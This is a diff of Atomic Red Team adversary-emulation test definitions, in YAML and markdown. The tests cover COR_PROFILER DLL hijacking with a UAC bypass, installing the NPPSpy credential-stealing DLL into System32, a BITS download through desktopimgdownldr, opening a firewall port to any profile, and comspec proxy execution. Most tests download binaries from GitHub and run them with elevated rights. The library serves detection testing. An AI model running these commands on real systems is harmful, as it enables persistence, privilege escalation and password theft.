+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1546.001:
    technique:
      created: '2020-01-24T13:40:47.282Z'
@@ -10189,129 +10411,7 @@ persistence:
      - Elastic
      x_mitre_platforms:
      - Windows
-      identifier: T1546.015
-    atomic_tests:
-    - name: COM Hijack Leveraging user scope COR_PROFILER
-      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
-      description: |
-        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by the Event Viewer process.
-        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
-        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
-        the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
-          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
-          START MMC.EXE EVENTVWR.MSC
-        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
-          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
-          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
-          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
-          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
-          -Force -ErrorAction Ignore | Out-Null\n"
-        name: powershell
-    - name: COM Hijack Leveraging System Scope COR_PROFILER
-      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
-      description: |
-        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
-        The unmanaged profiler DLL (`atomicNotepad.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
-        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
-        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unmanaged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          Write-Host "Creating system environment variables" -ForegroundColor Cyan
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
-          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
-        cleanup_command: |
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
-          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
-        name: powershell
-        elevation_required: true
-    - name: COM Hijack Leveraging registry-free process scope COR_PROFILER
-      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
-      description: 'Creates process scope environment variables to enable a .NET profiler
-        (COR_PROFILER) without making changes to the registry. The unmanaged profiler
-        DLL (`atomicNotepad.dll`) executes when the CLR is loaded by PowerShell.
-
-'
-      supported_platforms:
-      - windows
-      input_arguments:
-        file_name:
-          description: unamanged profiler DLL
-          type: Path
-          default: PathToAtomicsFolder\T1546.015\bin\T1546.015x64.dll
-        clsid_guid:
-          description: custom clsid guid
-          type: String
-          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
-      dependency_executor_name: powershell
-      dependencies:
-      - description: "#{file_name} must be present\n"
-        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-
-'
-        get_prereq_command: |
-          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/T1546.015x64.dll" -OutFile "#{file_name}"
-      executor:
-        command: |
-          $env:COR_ENABLE_PROFILING = 1
-          $env:COR_PROFILER = '#{clsid_guid}'
-          $env:COR_PROFILER_PATH = '#{file_name}'
-          POWERSHELL -c 'Start-Sleep 1'
-        cleanup_command: |
-          $env:COR_ENABLE_PROFILING = 0
-          $env:COR_PROFILER = ''
-          $env:COR_PROFILER_PATH = ''
-        name: powershell
+    atomic_tests: []
  T1554:
    technique:
      id: attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5
@@ -19288,20 +19388,38 @@ credential-access:
      auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
      description: |
        Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-        installed, along with WinPCAP. Windump will require the windump executable.
+        installed.

-        Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+        Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
      supported_platforms:
      - windows
      input_arguments:
        interface:
          description: Specify interface to perform PCAP on.
          type: String
-          default: Ethernet0
+          default: Ethernet
+        wireshark_url:
+          description: wireshark installer download URL
+          type: url
+          default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+        tshark_path:
+          description: path to tshark.exe
+          type: path
+          default: c:\program files\wireshark\tshark.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'tshark must be installed and in the default path of "c:\Program
+          Files\Wireshark\Tshark.exe".
+
+'
+        prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+          Start-Process $env:temp\wireshark_installer.exe /S
      executor:
-        command: |
-          "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-          c:\windump.exe
+        command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
+
+'
        name: command_prompt
        elevation_required: true
    - name: Windows Internal Packet Capture
@@ -19511,12 +19629,11 @@ credential-access:
      - windows
      dependency_executor_name: powershell
      dependencies:
-      - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
-        prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll")
-          {exit 0} else {exit 1}
-        get_prereq_command: |-
-          $rv = mkdir PathToAtomicsFolder\T1003\bin
-          Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+      - description: NPPSpy.dll must be available in local temp directory
+        prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit
+          1}
+        get_prereq_command: Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll
+          -OutFile "$env:Temp\NPPSPY.dll"
      executor:
        command: |-
          Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -21355,6 +21472,41 @@ defense-evasion:
          bitsadmin.exe /complete #{bits_job_name}
        cleanup_command: 'del #{local_file} >nul 2>&1

+'
+        name: command_prompt
+    - name: Bits download using destktopimgdownldr.exe (cmd)
+      auto_generated_guid: afb5e09e-e385-4dee-9a94-6ee60979d114
+      description: "This test simulates using destopimgdwnldr.exe to download a malicious
+        file\ninstead of a desktop or lockscreen background img. The process that
+        actually makes \nthe TCP connection and creates the file on the disk is a
+        svchost process (“-k netsvc -p -s BITS”) \nand not desktopimgdownldr.exe.
+        See https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: Remote file to download
+          type: url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md
+        download_path:
+          description: Local file path to save downloaded file
+          type: path
+          default: SYSTEMROOT=C:\Windows\Temp
+        cleanup_path:
+          description: path to delete file as part of cleanup_command
+          type: path
+          default: C:\Windows\Temp\Personalization\LockScreenImage
+        cleanup_file:
+          description: file to remove as part of cleanup_command
+          type: string
+          default: "*.md"
+      executor:
+        command: 'set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file}
+          /eventName:desktopimgdownldr
+
+'
+        cleanup_command: 'del #{cleanup_path}\#{cleanup_file}
+
 '
        name: command_prompt
  T1027.001:
@@ -21979,7 +22131,132 @@ defense-evasion:
      - Jesse Brown, Red Canary
      x_mitre_platforms:
      - Windows
-    atomic_tests: []
+      identifier: T1574.012
+    atomic_tests:
+    - name: User scope COR_PROFILER
+      auto_generated_guid: 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a
+      description: |
+        Creates user scope environment variables and CLSID COM object to enable a .NET profiler (COR_PROFILER).
+        The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by the Event Viewer process.
+        Additionally, the profiling DLL will inherit the integrity level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity.
+        If the account used is not a local administrator the profiler DLL will still execute each time the CLR is loaded by a process, however,
+        the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\#{clsid_guid}" -ForegroundColor Cyan
+          New-Item -Path "HKCU:\Software\Classes\CLSID\#{clsid_guid}\InprocServer32" -Value #{file_name} -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+          Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
+          START MMC.EXE EVENTVWR.MSC
+        cleanup_command: "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\"
+          -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment
+          -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty
+          -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore
+          | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\"
+          -Force -ErrorAction Ignore | Out-Null\n"
+        name: powershell
+    - name: System Scope COR_PROFILER
+      auto_generated_guid: f373b482-48c8-4ce4-85ed-d40c8b3f7310
+      description: |
+        Creates system scope environment variables to enable a .NET profiler (COR_PROFILER). System scope environment variables require a restart to take effect.
+        The unmanaged profiler DLL (T1574.012x64.dll`) executes when the CLR is loaded by any process. Additionally, the profiling DLL will inherit the integrity
+        level of Event Viewer bypassing UAC and executing `notepad.exe` with high integrity. If the account used is not a local administrator the profiler DLL will
+        still execute each time the CLR is loaded by a process, however, the notepad process will not execute with high integrity.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unmanaged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          Write-Host "Creating system environment variables" -ForegroundColor Cyan
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value "#{clsid_guid}" -Force | Out-Null
+          New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
+        cleanup_command: |
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -Force -ErrorAction Ignore | Out-Null
+          Remove-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -Force -ErrorAction Ignore | Out-Null
+        name: powershell
+        elevation_required: true
+    - name: Registry-free process scope COR_PROFILER
+      auto_generated_guid: 79d57242-bbef-41db-b301-9d01d9f6e817
+      description: |
+        Creates process scope environment variables to enable a .NET profiler (COR_PROFILER) without making changes to the registry. The unmanaged profiler DLL (`T1574.012x64.dll`) executes when the CLR is loaded by PowerShell.
+
+        Reference: https://redcanary.com/blog/cor_profiler-for-persistence/
+      supported_platforms:
+      - windows
+      input_arguments:
+        file_name:
+          description: unamanged profiler DLL
+          type: Path
+          default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll
+        clsid_guid:
+          description: custom clsid guid
+          type: String
+          default: "{09108e71-974c-4010-89cb-acf471ae9e2c}"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{file_name} must be present\n"
+        prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
+
+'
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll" -OutFile "#{file_name}"
+      executor:
+        command: |
+          $env:COR_ENABLE_PROFILING = 1
+          $env:COR_PROFILER = '#{clsid_guid}'
+          $env:COR_PROFILER_PATH = '#{file_name}'
+          POWERSHELL -c 'Start-Sleep 1'
+        cleanup_command: |
+          $env:COR_ENABLE_PROFILING = 0
+          $env:COR_PROFILER = ''
+          $env:COR_PROFILER_PATH = ''
+        name: powershell
  T1070.003:
    technique:
      external_references:
@@ -23688,6 +23965,24 @@ defense-evasion:
          protocol=TCP localport=450 >nul 2>&1
        name: command_prompt
        elevation_required: true
+    - name: Open a local port through Windows Firewall to any profile
+      auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
+      description: This test will attempt to open a local port defined by input arguments
+        to any profile
+      supported_platforms:
+      - windows
+      input_arguments:
+        local_port:
+          description: This is the local port you wish to test opening
+          type: integer
+          default: 3389
+      executor:
+        command: netsh advfirewall firewall add rule name="Open Port to Any" dir=in
+          protocol=tcp localport=#{local_port} action=allow profile=any
+        cleanup_command: netsh advfirewall firewall delete rule name="Open Port to
+          Any"
+        name: powershell
+        elevation_required: true
  T1562.001:
    technique:
      created: '2020-02-21T20:32:20.810Z'
@@ -32855,12 +33150,12 @@ defense-evasion:
        command_to_execute:
          description: A command to execute.
          type: Path
-          default: C:\Windows\System32\calc.exe
+          default: "%windir%\\System32\\calc.exe"
      executor:
        command: |
          set comspec=#{command_to_execute}
-          cscript manage-bde.wsf
-        cleanup_command: 'set comspec=C:\Windows\System32\cmd.exe
+          cscript %windir%\System32\manage-bde.wsf
+        cleanup_command: 'set comspec=%windir%\System32\cmd.exe

 '
        name: command_prompt
@@ -38693,7 +38988,7 @@ discovery:
      - description: 'NMap must be installed

 '
-        prereq_command: if (cmd /c nmap 2>nul) {exit 0} else {exit 1}
+        prereq_command: if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}
        get_prereq_command: |
          Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
          Start-Process $env:temp\nmap-7.80-setup.exe /S
@@ -38980,20 +39275,38 @@ discovery:
      auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
      description: |
        Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-        installed, along with WinPCAP. Windump will require the windump executable.
+        installed.

-        Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+        Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
      supported_platforms:
      - windows
      input_arguments:
        interface:
          description: Specify interface to perform PCAP on.
          type: String
-          default: Ethernet0
+          default: Ethernet
+        wireshark_url:
+          description: wireshark installer download URL
+          type: url
+          default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+        tshark_path:
+          description: path to tshark.exe
+          type: path
+          default: c:\program files\wireshark\tshark.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'tshark must be installed and in the default path of "c:\Program
+          Files\Wireshark\Tshark.exe".
+
+'
+        prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+        get_prereq_command: |
+          Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+          Start-Process $env:temp\wireshark_installer.exe /S
      executor:
-        command: |
-          "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-          c:\windump.exe
+        command: '"c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
+
+'
        name: command_prompt
        elevation_required: true
    - name: Windows Internal Packet Capture
@@ -145,15 +145,14 @@ Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore


 #### Dependencies:  Run with `powershell`!
-##### Description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
+##### Description: NPPSpy.dll must be available in local temp directory
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1} 
+if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```powershell
-$rv = mkdir PathToAtomicsFolder\T1003\bin
-Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
 ```


@@ -77,11 +77,10 @@ atomic_tests:
  - windows
  dependency_executor_name: powershell
  dependencies:
-  - description: NPPSpy.dll must exist in PathToAtomicsFolder\T1003\bin directory
-    prereq_command: if (Test-Path "PathToAtomicsFolder\T1003\bin\NPPSpy.dll") {exit 0} else {exit 1}
+  - description: NPPSpy.dll must be available in local temp directory 
+    prereq_command: if (Test-Path "$env:Temp\NPPSPY.dll") {exit 0} else {exit 1}
    get_prereq_command: |-
-      $rv = mkdir PathToAtomicsFolder\T1003\bin
-      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "PathToAtomicsFolder\T1003\bin\NPPSpy.dll"
+      Invoke-WebRequest -Uri https://github.com/gtworek/PSBits/raw/f221a6db08cb3b52d5f8a2a210692ea8912501bf/PasswordStealing/NPPSpy/NPPSPY.dll -OutFile "$env:Temp\NPPSPY.dll"
  executor:
    command: |-
      Copy-Item "$env:Temp\NPPSPY.dll" -Destination "C:\Windows\System32"
@@ -103,4 +102,4 @@ atomic_tests:
      Remove-Item C:\NPPSpy.txt -ErrorAction Ignore
      Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore
    name: powershell
-    elevation_required: true
+    elevation_required: true
@@ -109,9 +109,9 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;

 ## Atomic Test #3 - Packet Capture Windows Command Prompt
 Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-installed, along with WinPCAP. Windump will require the windump executable.
+installed.

-Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".

 **Supported Platforms:** Windows

@@ -121,7 +121,9 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac
 #### Inputs:
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| interface | Specify interface to perform PCAP on. | String | Ethernet0|
+| interface | Specify interface to perform PCAP on. | String | Ethernet|
+| wireshark_url | wireshark installer download URL | url | https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe|
+| tshark_path | path to tshark.exe | path | c:&#92;program files&#92;wireshark&#92;tshark.exe|


 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
@@ -129,12 +131,24 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac

 ```cmd
 "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-c:\windump.exe
 ```




+#### Dependencies:  Run with `powershell`!
+##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
+##### Check Prereq Commands:
+```powershell
+if (test-path "#{tshark_path}") {exit 0} else {exit 1} 
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+Start-Process $env:temp\wireshark_installer.exe /S
+```
+
+


 <br/>
@@ -59,20 +59,36 @@ atomic_tests:
  auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca
  description: |
    Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark
-    installed, along with WinPCAP. Windump will require the windump executable.
+    installed.

-    Upon successful execution, tshark will execute and capture 5 packets on interface Ethernet0.
+    Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet".
  supported_platforms:
  - windows
  input_arguments:
    interface:
      description: Specify interface to perform PCAP on.
      type: String
-      default: Ethernet0
+      default: Ethernet
+    wireshark_url:
+      description: wireshark installer download URL
+      type: url
+      default: https://2.na.dl.wireshark.org/win64/Wireshark-win64-3.2.6.exe
+    tshark_path:
+      description: path to tshark.exe 
+      type: path
+      default: c:\program files\wireshark\tshark.exe
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+       tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe".
+      prereq_command:
+        if (test-path "#{tshark_path}") {exit 0} else {exit 1}
+      get_prereq_command: |
+        Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}
+        Start-Process $env:temp\wireshark_installer.exe /S
  executor:
    command: |
      "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5
-      c:\windump.exe
    name: command_prompt
    elevation_required: true
    
@@ -120,7 +120,7 @@ nmap #{host_to_scan}
 ##### Description: NMap must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c nmap 2>nul) {exit 0} else {exit 1} 
+if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} 
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -71,7 +71,7 @@ atomic_tests:
  dependencies:
